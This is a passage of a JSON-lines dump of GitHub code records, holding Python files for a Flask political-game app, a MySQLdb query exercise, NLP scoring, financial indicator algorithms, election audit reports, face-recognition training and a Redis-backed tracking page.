Press enter to close terminal')\r\n","repo_name":"franccm/s8","sub_path":"S8_23.05.31_DF_exp.py","file_name":"S8_23.05.31_DF_exp.py","file_ext":"py","file_size_in_byte":41274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"30774376984","text":"# -*- coding: utf-8 -*- \r\nfrom datetime import datetime\r\nfrom sqlalchemy import func,update\r\nfrom flask import Blueprint, request, render_template, g,flash, Response, make_response, send_file, jsonify, session, redirect, url_for\r\nimport csv, sys, MySQLdb, os\r\nfrom os import environ\r\nimport datetime\r\n\r\nfrom pecbrasil import db\r\nfrom pecbrasil.liga.forms import LigaForm\r\nfrom pecbrasil.proposicao.forms import AvaliarForm\r\nfrom pecbrasil.proposicao.models import TimeVotacao,Proposicao,VotacaoCandidato\r\nfrom pecbrasil.liga.models import Liga,LigaPontos,LigaJogador\r\nfrom pecbrasil.politica.services import PoliticaServices\r\n\r\nmod = Blueprint('proposicao', __name__, url_prefix='/proposicao')\r\n \r\npoliticaServices = PoliticaServices() \r\n\r\n@mod.route('/votar///', methods=['GET', 'POST'])\r\ndef votar(proposicao=None,voto=None):\r\n if proposicao is not None:\r\n proposicaoObj = Proposicao.query.filter_by(id=proposicao).first() \r\n \r\n meuTime = politicaServices.meuTime(userId=g.user.id)\r\n \r\n if meuTime is not None and proposicaoObj is not None: \r\n timeVotacao = TimeVotacao( desc=liga_form.nome.data, \r\n data=datetime.datetime.now(), \r\n proposicao=proposicaoObj.id, \r\n time = meuTime.id,\r\n data_liga=datetime.datetime.now(), \r\n voto=voto)\r\n db.session.add(timeVotacao)\r\n db.session.commit()\r\n return render_template(\"liga/liga.html\",liga=liga)\r\n\r\n@mod.route('/avaliar/', methods=['GET', 'POST'])\r\ndef avaliar(proposicaoid=None):\r\n if g.user is None or not g.user.is_authenticated():\r\n flash('You need to be signed in for this.')\r\n return redirect(url_for('account.login'))\r\n proposicoes = Proposicao.query.filter_by(id=proposicaoid).first() \r\n meuForm = AvaliarForm(request.form)\r\n meuTime = politicaServices.meuTime(userId=g.user.id) \r\n if request.method == 'POST' and meuForm.validate_on_submit():\r\n timeVot = TimeVotacao.query.filter_by(time = meuTime.id, proposicao = proposicaoid).first()\r\n if timeVot is None:\r\n timeVot = TimeVotacao(desc=meuForm.desc.data, voto=meuForm.voto.data, data=datetime.datetime.now(), \\\r\n time = meuTime.id, proposicao = proposicaoid,necessidade=meuForm.necessidade.data) \r\n db.session.add(timeVot)\r\n else:\r\n timeVot.data=datetime.datetime.now()\r\n timeVot.necessidade=meuForm.necessidade.data\r\n timeVot.desc=meuForm.desc.data\r\n timeVot.voto=meuForm.voto.data\r\n \r\n db.session.commit()\r\n return verproposicao(proposicao_id=proposicaoid) \r\n return render_template(\"proposicao/avaliar.html\" , \\\r\n proposicaoid = proposicaoid,\r\n meuForm=meuForm,proposicoes=proposicoes)\r\n\r\n@mod.route('/listar/')\r\n@mod.route('/listar/')\r\n@mod.route('/listar//')\r\n@mod.route('/listar//')\r\n@mod.route('/listar///')\r\ndef proposicao(candidatura_id=None,partido_sigla=None,frame=None):\r\n # Proposicao\r\n proposicoes = politicaServices.proposicao(candidatura_id,partido_sigla)\r\n \r\n return render_template(\"proposicao/proposicaoList.html\", proposicoes = proposicoes, frame=frame)\r\n \r\n \r\n@mod.route('/ver/')\r\n@mod.route('/ver/')\r\n@mod.route('/ver//')\r\ndef verproposicao(proposicao_id=None):\r\n \r\n proposicoes = Proposicao.query.filter_by(id=proposicao_id).first()\r\n \r\n if 
proposicao_id is not None:\r\n return render_template(\"proposicao/proposicao.html\", proposicoes=proposicoes) \r\n \r\n\r\n@mod.route('/listarvotacao/')\r\n@mod.route('/listarvotacao/')\r\n@mod.route('/listarvotacao//')\r\n@mod.route('/listarvotacao//')\r\n@mod.route('/listarvotacao///')\r\ndef listarvotacao(candidatura_id=None,proposicao_id=None,frame=None):\r\n \r\n votacoes = politicaServices.votacao(proposicao_id,candidatura_id)\r\n \r\n return render_template(\"proposicao/votacaoList.html\", votacoes = votacoes, frame=frame)\r\n \r\n \r\n@mod.route('/votacao/')\r\n@mod.route('/votacao/')\r\n@mod.route('/votacao//')\r\ndef votacao(proposicao_id=None):\r\n \r\n votacoes = VotacaoCandidato.query.filter_by(proposicao=proposicao_id).first()\r\n \r\n if proposicao_id is not None:\r\n return render_template(\"proposicao/votacao.html\", votacoes=votacoes) \r\n \r\n@mod.route('/acao/')\r\n@mod.route('/acao/')\r\n@mod.route('/acao//')\r\n@mod.route('/acao///')\r\ndef acao(proposicao_id=None,candidatura_id=None,partido_id=None):\r\n \r\n dataInicio = request.args.get('inicio')\r\n frame = request.args.get('frame')\r\n #if dataInicio is None:\r\n # dataInicio= \"01/10/2010\"\r\n if proposicao_id:\r\n acoes = politicaServices.proposicaoacao(dataInicio,proposicao_id=proposicao_id,candidatura_id=candidatura_id,partido_sigla=partido_id)\r\n else:\r\n acoes = politicaServices.ultimasProposicaoacao()\r\n if len(acoes)>1:\r\n return render_template(\"proposicao/acaoList.html\", acoes=acoes,frame=frame) \r\n else:\r\n return render_template(\"proposicao/acao.html\", acoes=acoes,frame=frame) \r\n \r\n@mod.route('/novidades/')\r\n@mod.route('/novidades/')\r\n@mod.route('/novidades//')\r\n@mod.route('/novidades///')\r\ndef novidades(proposicao_id=None,candidatura_id=None,partido_id=None):\r\n \r\n dataInicio = request.args.get('inicio')\r\n frame = request.args.get('frame')\r\n #if dataInicio is None:\r\n # dataInicio= \"01/10/2010\"\r\n if proposicao_id:\r\n acoes = politicaServices.proposicaoacao(dataInicio,proposicao_id=proposicao_id,candidatura_id=candidatura_id,partido_sigla=partido_id)\r\n else:\r\n acoes = politicaServices.ultimasProposicaoacao()\r\n \r\n votacoes = politicaServices.ultimasProposicaovotacao()\r\n return render_template(\"proposicao/ultimasacoes.html\", acoes=acoes , votacoes=votacoes,frame=frame) \r\n\r\n","repo_name":"mariohmol/pecbrasil","sub_path":"pecbrasil/proposicao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"29594281884","text":"#!/usr/bin/python3\n\"\"\"\nThis is a module for mysqldb\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nif __name__ == '__main__':\n argv = sys.argv\n i = 0\n state_name = argv[4]\n\n if (len(argv) != 5):\n print(\"Usage: Arguments must be four!\")\n sys.exit(1)\n\n db = MySQLdb.connect(host='localhost', port=3306, user=argv[1],\n passwd=argv[2], db=argv[3])\n\n cur = db.cursor()\n cur.execute(\"SELECT cities.name\\\n FROM cities\\\n WHERE cities.state_id = (SELECT id\\\n FROM states\\\n WHERE name = %s)\\\n ORDER BY cities.id ASC\", (state_name,))\n cities = cur.fetchall()\n for rows in cities:\n for content in rows:\n if i in range(len(cities) - 1):\n print(content, end=', ')\n i += 1\n else:\n print(content)\n cur.close()\n 
db.close()\n","repo_name":"McMmie/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25238741480","text":"from collections import OrderedDict\nimport pandas as pd\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom scoring.scoring import summarize_event_df, summarize_event_csvs\nimport config.constants as C\r\nfrom scoring.scoring import score_brat\r\n\n\r\nbrat_true = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/brat_true/'\r\nbrat_predict = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/brat_predict/'\r\ndestination = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/'\r\n\r\nf1 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_strict.csv'\r\nf2 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_trig_overlap.csv'\r\nf3 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_trig_min_dist.csv'\r\nf4 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_all.csv'\r\nf5 = '/home/lybarger/sdoh_challenge/analyses/step110_extraction/train/e10_d2/temp/scores_relaxed_partial.csv'\r\nlabeled_args = [C.STATUS_TIME, C.TYPE_LIVING, C.STATUS_EMPLOY]\r\n\r\nscoring_defs = [ \\\r\n dict( \\\r\n score_trig = C.EXACT,\r\n score_span = C.EXACT,\r\n score_labeled = C.LABEL,\r\n description = 'strict'),\r\n dict( \\\r\n score_trig = C.OVERLAP,\r\n score_span = C.EXACT,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_trig_overlap'),\r\n dict( \\\r\n score_trig = C.MIN_DIST,\r\n score_span = C.EXACT,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_trig_min_dist'),\r\n dict( \\\r\n score_trig = C.MIN_DIST,\r\n score_span = C.OVERLAP,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_all'),\r\n dict( \\\r\n score_trig = C.MIN_DIST,\r\n score_span = C.PARTIAL,\r\n score_labeled = C.LABEL,\r\n description = 'relaxed_partial'),\r\n]\r\n\r\nfor scoring_def in scoring_defs:\r\n df = score_brat(brat_true, brat_predict, \\\r\n labeled_args = labeled_args,\r\n path = destination,\r\n **scoring_def)\r\n\r\n\r\n\nd = OrderedDict([('strict', f1), ('relaxed_trig_overlap', f2), ('relaxed_trig_min_dist', f3), ('relaxed_all', f4), ('relaxed_partial', f5)])\n\r\n\ndf = summarize_event_csvs(d)\r\nprint(df)\r\n","repo_name":"Lybarger/sdoh_extraction","sub_path":"sandbox/summarize_score_df.py","file_name":"summarize_score_df.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"33323824487","text":"\"\"\" Common algorithms usable on tables\n\"\"\"\nimport math\nimport builtins\nimport bisect\nfrom collections import deque\n\nfrom fin.utils.log import console\nfrom fin.seq.column import Column, get_column_name\n\nfrom fin.seq.algox import *\n\n# ======================================================================\n# Adapters\n# ======================================================================\ndef by_row(fct):\n \"\"\"\n Evaluates a function row by row on a list of columns.\n \"\"\"\n def _by_row(rowcount, *cols):\n result = [None]*rowcount\n i = 0\n rows = zip(*cols)\n while i < 
rowcount:\n row = next(rows)\n try:\n result[i] = fct(*row)\n except Exception as e:\n result[i] = str(e) # ???\n pass\n i += 1\n\n return Column(None,result)\n\n return _by_row\n\n# ======================================================================\n# Accumulator\n# ======================================================================\ndef acc(value, neg=False, pos=True):\n \"\"\"\n Increase the running value when pos is true, decrease it when neg is true.\n \"\"\"\n def _acc(rowcount, value, neg, pos):\n result = [None]*rowcount\n a = 0.0\n\n for i, (vi, ni, pi) in enumerate(zip(value, neg, pos)):\n if pi:\n a += vi\n if ni:\n a -= vi\n\n result[i] = a\n\n return result\n\n return (_acc, value, neg, pos)\n\ndef acc2(value, buy, sell):\n \"\"\"\n Simulate an investor that can buy and sell one share.\n\n The investor can only sell when it owns a share.\n \"\"\"\n def _acc(rowcount, value, buy, sell):\n result = [None]*rowcount\n share = 0\n cash = 0\n a = 0\n\n for i, (v, b, s) in enumerate(zip(value, buy, sell)):\n if b and not share:\n share = 1\n cash -= v\n if s and share:\n share = 0\n cash += v\n\n result[i] = share*v+cash\n\n return result\n\n return (_acc, value, buy, sell)\n\n# ======================================================================\n# Window functions\n# ======================================================================\ndef window(fct, n):\n def _window(rowcount, *cols):\n i = n-1\n result = [None]*rowcount\n while i < rowcount:\n result[i] = fct(i-n+1, i+1, *cols)\n i += 1\n\n return Column(None, result)\n\n return _window\n\ndef naive_window(fct, n):\n def _fct(start, end, *cols):\n return fct(*[col[start:end] for col in cols])\n\n return window(_fct, n)\n\n# ======================================================================\n# Stats\n# ======================================================================\ndef standard_deviation(n):\n \"\"\"\n Compute the Standard Deviation over a n-period window.\n \"\"\"\n var = variance(n)\n sqrt = math.sqrt\n\n def s(rowcount, values):\n va = var(rowcount, values)\n result = []\n push = result.append\n\n for v in va:\n push(None if v is None else sqrt(v))\n\n return Column(f\"STDDEV({n}), {get_column_name(values)}\", result)\n return s\n\ndef variance(n):\n \"\"\"\n Compute the Variance over a n-period window.\n \"\"\"\n a = 1.0/(n-1.0)\n b = a/n\n\n def s(rowcount, values):\n sigma_ui = 0.0\n sigma_ui2 = 0.0\n buffer = [None]*n\n nones = n\n ptr = 0\n result = []\n push = result.append\n\n for i, v in enumerate(values):\n x = buffer[ptr]\n\n try:\n sigma_ui -= x\n sigma_ui2 -= x*x\n except TypeError:\n nones -= 1\n\n buffer[ptr] = v\n ptr += 1\n if ptr == n:\n ptr = 0\n\n try:\n sigma_ui += v\n sigma_ui2 += v*v\n except TypeError:\n nones += 1\n\n push(None if nones else a*sigma_ui2 - b*sigma_ui*sigma_ui)\n\n return result\n return s\n\ndef correlation(n):\n \"\"\"\n Compute the Linear correlation between two columns over a n-period window.\n \"\"\"\n sqrt = math.sqrt\n\n def _correlation(col_x, col_y):\n try:\n x_bar = sum(col_x)/n\n y_bar = sum(col_y)/n\n except TypeError:\n return None\n\n covar = [(x-x_bar)*(y-y_bar) for x, y in zip(col_x, col_y)]\n x_minus_x_bar = [(x-x_bar)**2 for x in col_x]\n y_minus_y_bar = [(y-y_bar)**2 for y in col_y]\n return sum(covar)/(sqrt(sum(x_minus_x_bar))*sqrt(sum(y_minus_y_bar)))\n return naive_window(_correlation, n)\n\ndef volatility(n, tau=1/252):\n \"\"\"\n Compute the Annualized Historical Volatility over a n-period window.\n\n In practice this is the standard 
deviation of the day-to-day return.\n\n Parameters:\n n: the number of periods in the window. Often 20 or 21 for dayly data\n (corresponding to the number of trading days in one month)\n tau: inverse of the number of periods in one year\n \"\"\"\n stddev = standard_deviation(n)\n log = math.log\n k = math.sqrt(1/tau)\n vol = lambda stddev : stddev*k\n\n def _volatility(rowcount, values):\n # 1. Continuously compounded return for each period\n ui = map_change(lambda curr, prev: log(curr/prev))(rowcount, values)\n # 2. Standard deviation\n result = stddev(rowcount, ui)\n # 3. Annualized values\n return map(vol)(rowcount, result)\n\n return _volatility\n\ndef basic_sharpe_ratio(n):\n \"\"\"\n Compute the Sharpe Ratio ignoring risk free return over a n-period window.\n \"\"\"\n stddev = standard_deviation(n)\n\n def _basic_sharpe_ratio(rowcount, values):\n s = iter(stddev(rowcount, values))\n result = [None]*(n-1)\n push = result.append\n\n i = iter(values)\n for _, _, _ in zip(range(n-1), i, s):\n pass\n\n j = iter(values)\n for x_i, x_j, s_i in zip(i, j, s):\n try:\n ret = (x_i - x_j) # TODO replace by average daily return\n push(ret/s_i)\n except TypeError:\n push(None)\n\n return Column(f\"BSHARPE({n}), {get_column_name(values)}\", result)\n\n\n return _basic_sharpe_ratio\n\ndef best_fit(rowcount, col_x, col_y):\n \"\"\"\n Compute the Linear Best Fit over the full dataset.\n \"\"\"\n tx = []\n ty = []\n for x, y in zip(col_x, col_y):\n if x is not None and y is not None:\n tx.append(x)\n ty.append(y)\n\n x_bar = sum(tx)/len(tx)\n y_bar = sum(ty)/len(ty)\n\n covar = var = 0.0\n for x, y in zip(tx, ty):\n x_minus_x_bar = x-x_bar\n y_minus_y_bar = y-y_bar\n covar += x_minus_x_bar*y_minus_y_bar\n var += x_minus_x_bar*x_minus_x_bar\n\n beta = covar/var\n alpha = y_bar-x_bar*beta\n\n result = [None]*rowcount\n for i, x, in enumerate(col_x):\n try:\n result[i] = alpha+beta*x\n except TypeError:\n pass\n\n return Column(f\"BESTFIT, {get_column_name(col_y)}:{get_column_name(col_x)}\", result)\n\n\n# ======================================================================\n# Greeks\n# ======================================================================\ndef delta(n=1):\n \"\"\"\n Compute the Rate Of Change of a series over a period of time.\n\n Formally, y_i = x_i - x_(i-n).\n \"\"\"\n def _delta(rowcount, x):\n #\n # According to timeit, this is the fastest algorithm I could find\n #\n result = []\n store = result.append\n it = iter(x)\n jt = iter(x)\n\n # Consume the n first items\n for _ in range(n):\n store(None)\n next(it)\n\n # Remaining of the list\n for i, j in zip(it, jt):\n try:\n store(i-j)\n except TypeError:\n store(None)\n\n return result\n\n return _delta\n\ndef beta(n):\n \"\"\"\n Compute the Beta between two columns over a n-period window.\n \"\"\"\n def _beta(col_x, col_y):\n try:\n x_bar = sum(col_x)/n\n y_bar = sum(col_y)/n\n except TypeError:\n return None\n\n covar = [(x-x_bar)*(y-y_bar) for x, y in zip(col_x, col_y)]\n var = [(x-x_bar)**2 for x in col_x]\n return sum(covar)/sum(var)\n return naive_window(_beta, n)\n\ndef alpha(n):\n \"\"\"\n Compute the Alpha between two columns over a n-period window.\n \"\"\"\n def _alpha(col_x, col_y):\n try:\n x_bar = sum(col_x)/n\n y_bar = sum(col_y)/n\n except TypeError:\n return None\n\n covar = [(x-x_bar)*(y-y_bar) for x, y in zip(col_x, col_y)]\n var = [(x-x_bar)**2 for x in col_x]\n return y_bar - x_bar*sum(covar)/sum(var)\n return naive_window(_alpha, n)\n\n\n# 
======================================================================\n# Indicators\n# ======================================================================\ndef basing_point_bull(low, high):\n \"\"\"\n Magee's Basing Point in a bull market as explained in \"Technical Analysis\n for Stocks Trends, 11th Edition\" p365.\n\n This indicator will find Minor Bottoms from a (low, close) price pair.\n \"\"\"\n def _basing_point_bull(rowcount, low, high):\n MINUS_INF = float(\"-inf\")\n result = []\n push = result.append\n it = zip(range(rowcount), low, high)\n current = None\n highest = MINUS_INF\n n = 0\n\n for i, l, h in it:\n if l is None or h is None:\n push(current)\n continue\n if h > highest:\n # Possible new high\n high_day_of_the_lowest = highest = h\n lowest = l\n n = 0\n elif l < lowest:\n # Possible new low\n lowest = l\n high_day_of_the_lowest = h\n n = 0\n elif l > high_day_of_the_lowest:\n # One periode completly outside the lowest day\n n += 1\n\n if n > 2:\n # New Basing Point found. Reset.\n current = lowest\n highest = MINUS_INF\n\n push(current)\n\n return result\n\n return _basing_point_bull, low, high\n\ndef basing_point_bear(low, high):\n \"\"\"\n Magee's Basing Point in a bear market as explained in \"Technical Analysis\n for Stocks Trends, 11th Edition\" p365.\n\n This indicator will find Minor Tops from a (low, close) price pair.\n \"\"\"\n def _basing_point_bear(rowcount, low, high):\n PLUS_INF = float(\"inf\")\n result = []\n push = result.append\n it = zip(range(rowcount), low, high)\n current = None\n lowest = PLUS_INF\n n = 0\n\n for i, l, h in it:\n if l is None or h is None:\n push(current)\n continue\n if l < lowest:\n # Possible new low\n low_day_of_the_highest = lowest = l\n highest = h\n n = 0\n elif h > highest:\n # Possible new low\n highest = h\n low_day_of_the_highest = l\n n = 0\n elif h < low_day_of_the_highest:\n # One periode completly outside the highest day\n n += 1\n\n if n > 2:\n # New Basing Point found. 
Reset.\n current = highest\n lowest = PLUS_INF\n\n push(current)\n\n return result\n\n return _basing_point_bear, low, high\n\n# ======================================================================\n# Core functions\n# ======================================================================\ndef constantly(value):\n \"\"\"\n Evaluates to a list made of contant values.\n \"\"\"\n def _constantly(rowcount):\n return [value]*rowcount\n\n return _constantly\n\ndef shift(n):\n \"\"\"\n Shift a column by n periods.\n\n Sometimes called the \"lag\" operator.\n \"\"\"\n def _shift(rowcount, values):\n if n > 0:\n return values[n:] + [None]*n\n else:\n return [None]*-n + values[:n]\n\n return _shift\n\ndef min(n):\n \"\"\"\n Sliding minimum over a n-periods window.\n \"\"\"\n assert n > 0\n def _min(rowcount, values):\n result = []\n store = result.append\n queue = deque()\n popleft = queue.popleft\n pushright = queue.append\n cooldown = n-1\n\n for value in values:\n try:\n while len(queue) >= n:\n popleft()\n while len(queue) and queue[0] > value:\n popleft()\n pushright(value)\n except TypeError:\n cooldown = n\n\n if cooldown:\n store(None)\n cooldown -= 1\n else:\n store(queue[0])\n\n return result\n\n return _min\n\ndef max(n):\n \"\"\"\n Sliding maximum over a n-periods window.\n \"\"\"\n assert n > 0\n def _max(rowcount, values):\n result = []\n store = result.append\n queue = deque()\n popleft = queue.popleft\n pushright = queue.append\n cooldown = n-1\n\n for value in values:\n try:\n while len(queue) >= n:\n popleft()\n while len(queue) and queue[0] < value:\n popleft()\n pushright(value)\n except TypeError:\n cooldown = n\n\n if cooldown:\n store(None)\n cooldown -= 1\n else:\n store(queue[0])\n\n return result\n\n return _max\n\ndef ratio_old(rowcount, a, b):\n \"\"\"\n Evaluates to the line-by-line ratio of two columns.\n\n Formally, y_i = to a_i/b_i.\n \"\"\"\n result = [None]*rowcount\n for idx, a_i, b_i in zip(range(rowcount), a, b):\n try:\n result[idx] = a_i/b_i\n except TypeError:\n # One value is probably None\n pass\n except ZeroDivisionError:\n # b_i is 0.0\n result[idx] = float(\"inf\") if a_i > 0 else float(\"-inf\") if a_i < 0 else None\n\n return Column(f\"{get_column_name(a)}/{get_column_name(b)}\", result)\n\n# ======================================================================\n# Compound functions\n# ======================================================================\ndef ratio_to_moving_average(n):\n ma = sma(n)\n\n def _ratio_to_moving_average(rowcount, a):\n b = ma(rowcount, a)\n return ratio(rowcount, a, b)\n\n return _ratio_to_moving_average\n\n# ======================================================================\n# Projections\n# ======================================================================\ndef map(fct):\n \"\"\"\n Map data using a user-provided function.\n\n Handle None gracefully (as opposed to `builtins.map`)\n\n Formally, y_i = f(u_i)\n \"\"\"\n def _map(rowcount, values):\n return Column(None, [fct(x) if x is not None else None for x in values])\n\n return _map\n\ndef mapn(fct):\n \"\"\"\n Map data using y_i = f(u_i0 .. 
u_in)\n \"\"\"\n def _mapn(rowcount, *values):\n result = []\n push = result.append\n for i, row in enumerate(zip(*values)):\n try:\n push(fct(*row))\n except TypeError:\n push(None)\n\n return result\n\n return _mapn\n\ndef map_change(fct):\n \"\"\"\n Map data using y_i = f(u_i, u_i-1)\n \"\"\"\n def _map(rowcount, values):\n result = [None]*rowcount\n prev = None\n\n for i, x in enumerate(values):\n if x is not None and prev is not None:\n result[i] = fct(x, prev)\n\n prev = x\n\n return result\n\n return _map\n\ndef _index(col, x, *, bsearch=bisect.bisect_left):\n \"\"\"\n Return the index of x in col, assuming col is sorted is ascending order.\n \"\"\"\n idx = bsearch(col, x)\n if idx == len(col) or col[idx] != x:\n raise ValueError\n\n return idx\n\ndef line(x1, x2):\n \"\"\"\n Compute the line passing by (x1, y1_x1) and (x2, y2_x2).\n \"\"\"\n def _line(rowcount, x_col, y1_col, y2_col=None):\n if y2_col is None:\n y2_col = y1_col\n\n x1_idx = _index(x_col, x1)\n x2_idx = _index(x_col, x2)\n y1 = y1_col[x1_idx]\n y2 = y2_col[x2_idx]\n\n if y1 is None or y2 is None:\n return [None]*rowcount\n\n # y = a+bx\n b = (y2-y1)/(x2_idx-x1_idx)\n a = y1-b*x1_idx\n result = []\n push = result.append\n\n for i in range(rowcount):\n push(a+b*i)\n\n return result\n\n return _line\n\n# ======================================================================\n# Calendar functions\n# ======================================================================\nimport fin.seq.table\nfrom fin import datetime\n\ndef shift_date(delta):\n \"\"\"\n Offset a calendar date.\n \"\"\"\n offset = datetime.asCalendarDateDelta(delta)\n\n def _shift_date(rowcount, dates):\n name = getattr(dates, \"name\", None)\n\n result = [None]*rowcount\n for idx, date in enumerate(dates):\n try:\n result[idx] = date+offset\n except ValueError:\n pass\n\n return fin.seq.table.Column(name,result)\n\n return _shift_date\n\ndef hist2(f, n, interval):\n \"\"\"\n Apply a function to data et recuring intervals\n \"\"\"\n assert interval > 0\n def _hist(rowcount, data):\n result = [None]*rowcount\n for i, value in enumerate(data):\n if i < interval:\n result[i] = []\n else:\n result[i] = [value] + result[i-interval][:n]\n\n result = builtins.map(f, result)\n return result\n\n return _hist\n\ndef hist(f, n, years=0, months=0, days=0):\n \"\"\"\n Apply a function to data at recuring intervals.\n \"\"\"\n offset = datetime.CalendarDateDelta(years, months, days)\n def _hist(rowcount, dates, data):\n # First, build an index from date to row number:\n index = { date: idx for idx, date in enumerate(dates) }\n\n # Then build a mapping from one date to the preceeding period.\n translation = {}\n previous = None\n for date in dates:\n print(date, offset, date+offset, date+offset in index)\n try:\n other = date+offset\n except ValueError:\n continue\n\n # Map a date to its preceeding period if it exists,\n # else, use the closest matching date\n if other in index:\n translation[date] = other\n previous = other\n else:\n translation[date] = previous\n print(translation)\n\n # Now, for each date, build a vector of the values at recuring intervals\n result = [None]*rowcount\n for i, date in enumerate(dates):\n print(date, end=' ')\n v = []\n for j in range(n):\n idx = index.get(date, None)\n v.append(data[idx] if idx is not None else None)\n date = translation.get(date, None)\n if date is None:\n break\n result[i] = f(v)\n print()\n\n return result\n\n return 
_hist\n","repo_name":"s-leroux/fin","sub_path":"fin/seq/algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":19328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72353017225","text":"#Place to put my analyses for now\nimport auditLog\nimport ballotImage\nimport dateMod\nimport datetime\nimport dateutil.parser\nimport report\n\ndef datesUnset(dateclass, ballotclass):\n r = report.Report()\n t1 = report.Table()\n t2 = report.Table()\n \n r.addTitle('Incorrectly Set Dates')\n\n if not (len(dateclass.D1) or len(dateclass.D2)):\n r.addTextBox('No dates were found to be incorrectly set after being opened for elections')\n else:\n precinctMap = ballotclass.getPrecinctNameMap()\n d = {}\n\n r.addTextBox('These machines have been identified as having incorrectly set clocks. Having invalid clocks can preclude further log analysis. The results have been catagorized into two tables')\n\n r.addTextBox('

Table 1: Precincts Manually Adjusted During Elections')\r\n        if len(dateclass.D1) == 0:\r\n            r.addTextBox('No machines found.')\r\n        else:\r\n            r.addTextBox('List of machines by precinct with manual time adjustments during election day and after being opened for voting')\r\n            t1.addHeader('Precinct')\r\n            t1.addHeader('# of Machines')\r\n\r\n            for k in dateclass.D1.keys():\r\n                if k in precinctMap:\r\n                    key = precinctMap[k]\r\n                elif k in ballotclass.getEarlyVotingList():\r\n                    key = 'Absentee'\r\n                elif k in ballotclass.getFailsafeList():\r\n                    key = 'Failsafe'\r\n                else:\r\n                    key = k\r\n\r\n                if key in d:\r\n                    d[key] = d[key] + 1\r\n                else:\r\n                    d.update({key:1})\r\n            for k,v in d.iteritems():\r\n                t1.addRow([k, str(v)])\r\n\r\n            r.addTable(t1)\r\n\r\n        if len(dateclass.D2) != 0:\r\n            r.addTextBox('Table 2: Machines never set correctly')\r\n            r.addTextBox('List of machines that conducted election day voting start to finish with an incorrect clock.
')\n t2.addHeader('Serial #')\n t2.addHeader('Open Date')\n t2.addHeader('Close Date')\n for k,v in dateclass.D2.iteritems():\n t2.addRow([str(k), str(v[0]), str(v[1])])\n\n r.addTable(t2)\n else:\n r.addTextBox('No machines found.')\n\n return r \n\ndef dateErrors(dateclass, ballotclass):\n r = report.Report()\n t = report.Table()\n \n r.addTitle('Datetime Errors')\n\n if len(dateclass.D3) == 0:\n r.addTextBox('No date errors found')\n else:\n r.addTextBox('List machines with detected date anomalies. Includes last known \"good\" event as well as what event was determined to be the error and how many following events it affected.')\n t.addHeader('Machine')\n t.addHeader('Last Event')\n t.addHeader('Anomalous Event')\n t.addHeader('Occurances')\n for k,v in dateclass.D3.iteritems():\n t.addRow([k, str(v[0]), str(v[1]), str(v[2])])\n\n r.addTable(t)\n\n return r \n","repo_name":"davidwagner/audit-bear","sub_path":"web2py/applications/audit_bear/modules/myanalyses.py","file_name":"myanalyses.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"73048471946","text":"import cv2\nimport os\nimport sys\nimport numpy as np\nfrom PIL import Image\n\ndef getImagesAndLabels(path):\n\timage_paths = [os.path.join(path,f) for f in os.listdir(path)]\n\timages = []\n\tlabels = []\n\tfor image_path in image_paths:\n\t\timage_pillow = Image.open(image_path).convert('L')\n\t\timage_np = np.array(image_pillow,'uint8')\n\t\tlabel = int(os.path.split(image_path)[1].split(\".\")[0])\n\t\tfaces = detector.detectMultiScale(image_np)\n\t\t# faces = faceCascade.detectMultiScale(image)\n\t\t# for (x,y,w,h) in faces:\n\t\t\t# images.append(image_np[y:y+h,x:x+w])\n\t\t\t# labels.append(label)\n\t\tlabels.append(label)\n\t\timages.append(image_np)\n\treturn images, labels\n\nif __name__ == '__main__':\n\trecognizer = cv2.face.LBPHFaceRecognizer_create()\n\tdetector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\n\tfaces, labels = getImagesAndLabels(\"dataset/TrainingSet\")\n\trecognizer.train(faces, np.array(labels))\n\trecognizer.write('trainer/trainer.yml')","repo_name":"jingtalabucon/SpecialProblem","sub_path":"face_recog.py","file_name":"face_recog.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5703009312","text":"from flask import render_template, Flask, redirect, jsonify\nfrom flask_restful import reqparse\nimport redis\nfrom os import environ as config\nimport pickle\n\napp = Flask(__name__)\n\ncache = redis.StrictRedis(host=config['REDIS_HOST'], port=int(config['REDIS_PORT']), db=0)\n\n@app.route('/tracking//', methods=['GET'])\ndef serve_tracking_page(tracking_id):\n\tcontext = {}\n\tcontext['tracking_id'] = tracking_id\n\n\tif cache.exists('tracking:'+tracking_id):\n\t\treturn render_template('track.html', **context)\n\telse:\n\t\treturn redirect('/static/inactive.html')\n\n@app.route('/tracking/pin/verify/', methods=['POST'])\ndef verify_pin():\n\t\tparser = reqparse.RequestParser()\n\t\tparser.add_argument('trackingId', type=str)\n\t\tparser.add_argument('pin', type=str)\n\n\t\targs = 